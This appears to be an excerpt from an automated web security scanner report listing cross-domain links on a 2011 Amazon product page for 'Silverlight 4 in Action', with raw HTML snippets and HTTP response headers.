<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHEUeEYZHw82XX2TbjnZnQ0LSs-l6vjQitR6lYv5FK1o3fiDAuPESS3LfegUx1bITB17o6SGiA1ADUV9HmsfZVRCHVOG5LLMtXr.DEsfl-fA0jSYOF37s2fK41.mIMq1duwf9bc.EAu2kLT5tdOyEhCUlLNBSutrYo2ZvxCliONTScfR.J4jIlUc3ytdExg.qk4qbTndrlQpH7GMfbSTRZKv3SK5AswLgCSA3s64HokwcgrzU1EPqa9gGW1WINM147Njiv-uHrgdNYYkge8QeAGYP9x178C9m6Jpncs5KKY0daR0JYV8XpHyRSvEYbKzhYF-BY91PS5EhdRXjG.WIPTb7YstAIUdPqwV6ePkEfVmTvBG8US8kZsMIrUE-mHTC3W30M3Sf8orijmHnYDE-1-pwzIzbnVgxlnr66zgTlpNJylZVJ74gR-QR7aVC9KDRgxLpxmdrLMInkHqJW-w7UPFz8lSFTZcHv-f1pUuVE8CR5gBPYr-oTnuHj29-LuHxm75M22S.c4E5mrp.jr4mEcQhDgFAioUTirkq1-qMnNdDd7zmzo3QcDgbTJXqVAYkOWszh2CI3g.0A-f1zM.UyiXuKzPI3B2lnJwkY5qlTE9OEGh7Ua-oWY_&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHEUeEYZHw82XX2TbjnZnQ0LSs-l6vjQitR6lYv5FK1o3fiDAuPESS3LfegUx1bITB17o6SGiA1ADUV9HmsfZVRCHVOG5LLMtXr.DEsfl-fA0jSYOF37s2fK41.mIMq1duwf9bc.EAu2kLT5tdOyEhCUlLNBSutrYo2ZvxCliONTScfR.J4jIlUc3ytdExg.qk4qbTndrlQpH7GMfbSTRZKv3SK5AswLgCSA3s64HokwcgrzU1EPqa9gGW1WINM147Njiv-uHrgdNYYkge8QeAGYP9x178C9m6Jpncs5KKY0daR0JYV8XpHyRSvEYbKzhYF-BY91PS5EhdRXjG.WIPTb7YstAIUdPqwV6ePkEfVmTvBG8US8kZsMIrUE-mHTC3W30M3Sf8orijmHnYDE-1-pwzIzbnVgxlnr66zgTlpNJylZVJ74gR-QR7aVC9KDRgxLpxmdrLMInkHqJW-w7UPFz8lSFTZcHv-f1pUuVE8CR5gBPYr-oTnuHj29-LuHxm75M22S.c4E5mrp.jr4mEcQhDgFAioUTirkq1-qMnNdDd7zmzo3QcDgbTJXqVAYkOWszh2CI3g.0A-f1zM.UyiXuKzPI3B2lnJwkY5qlTE9OEGh7Ua-oWY_&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">Microsoft.com/Business</a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-Silverlight-SharePoint-2010-Integration/dp/184968006X/ref=pd_bxgy_b_img_a"><img src="http://ecx.images-amazon.com/images/I/412BbFUyhyL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="75" alt="Microsoft Silverlight 4 and SharePoint 2010 Integration" id="bxgy_img_a" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/SharePoint-Development-Visual-Studio-Microsoft/dp/0321718313/ref=pd_bxgy_b_img_b"><img src="http://ecx.images-amazon.com/images/I/51j5pqB8cxL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="SharePoint 2010 Development with Visual Studio 2010 (Microsoft .NET Development Series)" id="bxgy_img_b" height="75" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Microsoft-SharePoint-2010-Solutions-Professionals/dp/1430228652/ref=pd_bxgy_b_img_c"><img src="http://ecx.images-amazon.com/images/I/514bKibhb7L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="75" alt="Microsoft SharePoint 2010: Building Solutions for SharePoint 2010 (Books for Professionals by Professionals)" id="bxgy_img_c" height="75" border="0" /></a>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/514bKibhb7L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51j5pqB8cxL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51iRGOliXtL._SL500_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/41kH6%2BdrJKL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51gaT-e4LjL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div class="product-image">
<img src="http://ecx.images-amazon.com/images/I/51yNm0-0X1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading…" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/412BbFUyhyL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Microsoft Silverlight 4 and SharePoint 2010 Integration" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/SharePoint-Development-Visual-Studio-Microsoft/dp/0321718313/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_0321718313" ><img src="http://ecx.images-amazon.com/images/I/51j5pqB8cxL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="SharePoint 2010 Development with Visual Studio 2010 (Microsoft .NET Development Series)" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Professional-SharePoint-Branding-Interface-Programmer/dp/0470584645/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_0470584645" ><img src="http://ecx.images-amazon.com/images/I/51iRGOliXtL._SL75_SS50_.jpg" width="50" alt="Professional SharePoint 2010 Branding and User Interface Design (Wrox Programmer to Programmer)" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_1935182374" ><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Silverlight 4 in Action" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&nodeId=518316">
...[SNIP]...
<td>


                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" /> Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?

    <b>
...[SNIP]...
<a href="/ref=footer_logo/177-9736946-2435046"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

22.377. http://www.amazon.com/gp/product/1935182374 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/gp/product/1935182374

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/gp/product/1935182374?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=1935182374

The response contains the following links to other domains:

http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml
http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/41QizTXOm1L._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/41ednsqKVdL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/512N51+QbGL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/512qJmTNIXL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg
http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg
http://ecx.images-amazon.com/images/I/51ZBCnP8+0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL75_SS50_.jpg
http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://g-ecx.images-amazon.com/images/G/01/Books/grutty/burst/buyback_75-b._SS75_V174666444_.gif
http://g-ecx.images-amazon.com/images/G/01/books/student/50_amazon_student._V187616879_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16piv._V172849515_.png
http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif
http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif
http://g-ecx.images-amazon.com/images/G/01/sdp/popover/fba/amz-prime._V192217000_.gif
http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif
http://rd.a9.com/srv/redirect/?info=AB-IWy0KEPFGTfwkPoWj0qbesXfgyWeF6kOif9y4CnZOyl6t62ekKFQZ2JCs3C6MQiueTCOw4zJFRV.wtksscZ5E1OFo0IAcUaPDYaEseVilTbtFGwjQPWGZ3OkTXm9Rztqp-Thee4sNWapeyRLiifgjf6zrboGQmR9P2zHzUfAe4-qNgcSEEeWovfSwkDRcwoW77OlZikBe987yfogfjanEMCLGfnpi253Vj4PDEMOGbnqEbN8YNU2lh4EcAeEbq7rq4UoNi-n8rk7qdW1WoxAlDWvB9CHb5qGFeRV3Poazh7BbBZfv3jQDxjVIHwND6OHd2qrarFkmtthpEnwXboNNPtE6de2DED6F.Y12XNj-lbnJhnBhgbqfDglXr6ZkCcqMt2fAN0UkYW-ku1YrL-3GeIcCpgLRsnuwmo6VLoX9Rjy5eZ.zwtkXbvNgXybl9lBODf2Ryo3A.WbgmeUJ0jv.UyuW-hPOfhEF9Z56Ch3Q&awt=1&s=
http://rd.a9.com/srv/redirect/?info=AJVE4roMc9uJBa0QoAIGtyVEaPVCoG0ZacmynYumBJTCjyLXrYn-CWaiaabPwp58yklJbsO0P0wkO6F4JCLXYKvGd1yHfyaCwihARByMZ2tP48hMU6jCiRi5csqeQdUmknqmSC7J-e1Uf27KEtv5aWOgANXk5yY9CUZwDD0jbgBfkB5IybH8rbzYUpiDg-1B9YRWCvSCst4mHt8NoCyRvqAEWqu77h-m81SZcWxlUkXVrdtp3st5BJQR2M60ksytqiD1R0sBCKz2DJf6bkRaA6O-GdoAMeVeYotH9qInGKRl9v4piq5tvXUvztrPR4k4rrcs6N-HlZy0Qj-f-4nbsHxx.FMI-X-lL-yXfpM2ujWrjXezmakBpDbhnuHVJQx9Uw-Qp62oVnfVkt3zEyLp9EmOLyBTKAHcFLg8PWdHDXIgI4tWE3sILsisxhqCDD11rT6eb9li1P21VvrHvpvMH0ijIMp8.oC6SA__&awt=1&s=
http://rd.a9.com/srv/redirect/?info=AM5SVv0KqREifjrGNESMjnMS3oqEQA8jwjlxLdh2lG8n2F0ZxnHVZPw2YLzXRtPqKDAUbEblv7sjnu9CsTTbPxg8O1VmGyjizm0.cknzUoDL0dW5X8DM24Dky7Ba7JUtajcRC2DrmiCHw.izg231ccdWk0L84dFPjoZVk5DIcfBSjoN6VH6PlyDCzv-JeNs0BbzkqxzEU9SLZHGCdtWZVGundZ46wItUcV11ASMFfLkSl0K.3nWXnOZlLgZIUJo39NRdKE4vwow5rPcfv3hyvWdwtEx5gg2jGQvf9LePrezTrD1VkEUTyDgNRt2OzMzd2kCE7ReJ5M2wkJHy7nCrYwys8w1MSYEpsnqwp-TC-30FKRty5YfBUelWheG6KKdCJxWurqOiz4X-FASLpEROwdQif0pHxRbbCpuwNdVmmokRl5yajnBOLgpoVkySrR3N6-jsdTcdFMNZiurfRZNfyhjvHNJUR4yvg-NrZR1lDoR6tKpU8SiwjZhZY78TGi22tV91F-vooDPf&awt=1&s=
http://www.amazon.ca/
http://www.amazon.cn/
http://www.amazon.de/
http://www.amazon.fr/
http://www.amazon.it/
http://www.audible.com/
http://www.dpreview.com/
http://www.endless.com/
http://www.fabric.com/
http://www.imdb.com/
http://www.shopbop.com/welcome
http://www.smallparts.com/
http://www.warehousedeals.com/
http://www.woot.com/
http://www.zappos.com/
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5869551106.css._V171084207_.css
http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css
http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:57:41 GMT
Server: Server
x-amz-id-1: 027K1D9QR6E9AFT1A078
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: OwxFpFf0hMIMGCKro+1twDX6vYIw54wEe8OMhd2f+vuqXSu73tXT+Lh8+P6LR4ix
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=186-7103494-9643855; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=Z35lEbXZmkNfw6hGfUjZ1K/4sw9WxxWFwMV/sJojBHuQgfFG+laL6NBK88paqKSztzsyJyDY/9AAZYrH81BfgD8rTRvxvEg+urhq3RkrxgkxmmIIkrtyYCUV+2HgzOsTjXded6kudqqsvL+RF9iqh9s1neAJEhZBJuQUJ6fV0vKWxj1UV3P224fkpsI34l5gnXdRjQwvL69Ix88BfWLYI1n0WolrEPJNgIAYMPxxB/4wzXf/fS2hwoXMhWseZz0UfRaIwEdIw8o0SertvxEIxH98QQoDQBKeCwqeNTJsxrj/Bt5gtr5CqobKWBENaQBEtNCUoEJcD/ax5YGH2AVRSkMtliytO5We6vXhJWjcvqI/oN7HTuAspZxJdqvTNivZFw8Tkca7cqqHW5RaIwD9nbIS0tdyjDTRrfW9etHNUOHiSMqa9Msf4bwp5+Uydtaan0m/Rcv1EfQ=; path=/; domain=.amazon.com; expires=Sun Feb 06 15:57:41 2011 GMT
Content-Length: 399873

<html>
<head>

<style type="text/css">
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<em>FBA items qualify for FREE Super Saver Shipping and <img src="http://g-ecx.images-amazon.com/images/G/01/sdp/popover/fba/amz-prime._V192217000_.gif" width="92" alt="Amazon Prime" height="12" border="0" />.</em>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=1935182374"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/1935182374/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Silverlight 4 in Action" onmouseover="" /></a>
...[SNIP]...
on.com/gp/student/signup/info&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=product-alert&pf_rd_r=027K1D9QR6E9AFT1A078&pf_rd_t=201&pf_rd_p=1284419222&pf_rd_i=1935182374"><img src="http://g-ecx.images-amazon.com/images/G/01/books/student/50_amazon_student._V187616879_.gif" width="50" align="left" alt="Textbook Student" height="37" border="0" /></a>
...[SNIP]...
<div style="float: left; width: 75px; padding-right: 8px;"><img src="http://g-ecx.images-amazon.com/images/G/01/Books/grutty/burst/buyback_75-b._SS75_V174666444_.gif" width="75" height="75" border="0" /></div>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJVE4roMc9uJBa0QoAIGtyVEaPVCoG0ZacmynYumBJTCjyLXrYn-CWaiaabPwp58yklJbsO0P0wkO6F4JCLXYKvGd1yHfyaCwihARByMZ2tP48hMU6jCiRi5csqeQdUmknqmSC7J-e1Uf27KEtv5aWOgANXk5yY9CUZwDD0jbgBfkB5IybH8rbzYUpiDg-1B9YRWCvSCst4mHt8NoCyRvqAEWqu77h-m81SZcWxlUkXVrdtp3st5BJQR2M60ksytqiD1R0sBCKz2DJf6bkRaA6O-GdoAMeVeYotH9qInGKRl9v4piq5tvXUvztrPR4k4rrcs6N-HlZy0Qj-f-4nbsHxx.FMI-X-lL-yXfpM2ujWrjXezmakBpDbhnuHVJQx9Uw-Qp62oVnfVkt3zEyLp9EmOLyBTKAHcFLg8PWdHDXIgI4tWE3sILsisxhqCDD11rT6eb9li1P21VvrHvpvMH0ijIMp8.oC6SA__&awt=1&s=" rel="nofollow">60+ <b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJVE4roMc9uJBa0QoAIGtyVEaPVCoG0ZacmynYumBJTCjyLXrYn-CWaiaabPwp58yklJbsO0P0wkO6F4JCLXYKvGd1yHfyaCwihARByMZ2tP48hMU6jCiRi5csqeQdUmknqmSC7J-e1Uf27KEtv5aWOgANXk5yY9CUZwDD0jbgBfkB5IybH8rbzYUpiDg-1B9YRWCvSCst4mHt8NoCyRvqAEWqu77h-m81SZcWxlUkXVrdtp3st5BJQR2M60ksytqiD1R0sBCKz2DJf6bkRaA6O-GdoAMeVeYotH9qInGKRl9v4piq5tvXUvztrPR4k4rrcs6N-HlZy0Qj-f-4nbsHxx.FMI-X-lL-yXfpM2ujWrjXezmakBpDbhnuHVJQx9Uw-Qp62oVnfVkt3zEyLp9EmOLyBTKAHcFLg8PWdHDXIgI4tWE3sILsisxhqCDD11rT6eb9li1P21VvrHvpvMH0ijIMp8.oC6SA__&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJVE4roMc9uJBa0QoAIGtyVEaPVCoG0ZacmynYumBJTCjyLXrYn-CWaiaabPwp58yklJbsO0P0wkO6F4JCLXYKvGd1yHfyaCwihARByMZ2tP48hMU6jCiRi5csqeQdUmknqmSC7J-e1Uf27KEtv5aWOgANXk5yY9CUZwDD0jbgBfkB5IybH8rbzYUpiDg-1B9YRWCvSCst4mHt8NoCyRvqAEWqu77h-m81SZcWxlUkXVrdtp3st5BJQR2M60ksytqiD1R0sBCKz2DJf6bkRaA6O-GdoAMeVeYotH9qInGKRl9v4piq5tvXUvztrPR4k4rrcs6N-HlZy0Qj-f-4nbsHxx.FMI-X-lL-yXfpM2ujWrjXezmakBpDbhnuHVJQx9Uw-Qp62oVnfVkt3zEyLp9EmOLyBTKAHcFLg8PWdHDXIgI4tWE3sILsisxhqCDD11rT6eb9li1P21VvrHvpvMH0ijIMp8.oC6SA__&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.componentone.com/freetrial</a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AB-IWy0KEPFGTfwkPoWj0qbesXfgyWeF6kOif9y4CnZOyl6t62ekKFQZ2JCs3C6MQiueTCOw4zJFRV.wtksscZ5E1OFo0IAcUaPDYaEseVilTbtFGwjQPWGZ3OkTXm9Rztqp-Thee4sNWapeyRLiifgjf6zrboGQmR9P2zHzUfAe4-qNgcSEEeWovfSwkDRcwoW77OlZikBe987yfogfjanEMCLGfnpi253Vj4PDEMOGbnqEbN8YNU2lh4EcAeEbq7rq4UoNi-n8rk7qdW1WoxAlDWvB9CHb5qGFeRV3Poazh7BbBZfv3jQDxjVIHwND6OHd2qrarFkmtthpEnwXboNNPtE6de2DED6F.Y12XNj-lbnJhnBhgbqfDglXr6ZkCcqMt2fAN0UkYW-ku1YrL-3GeIcCpgLRsnuwmo6VLoX9Rjy5eZ.zwtkXbvNgXybl9lBODf2Ryo3A.WbgmeUJ0jv.UyuW-hPOfhEF9Z56Ch3Q&awt=1&s=" rel="nofollow"><b>Silverlight</b></a>
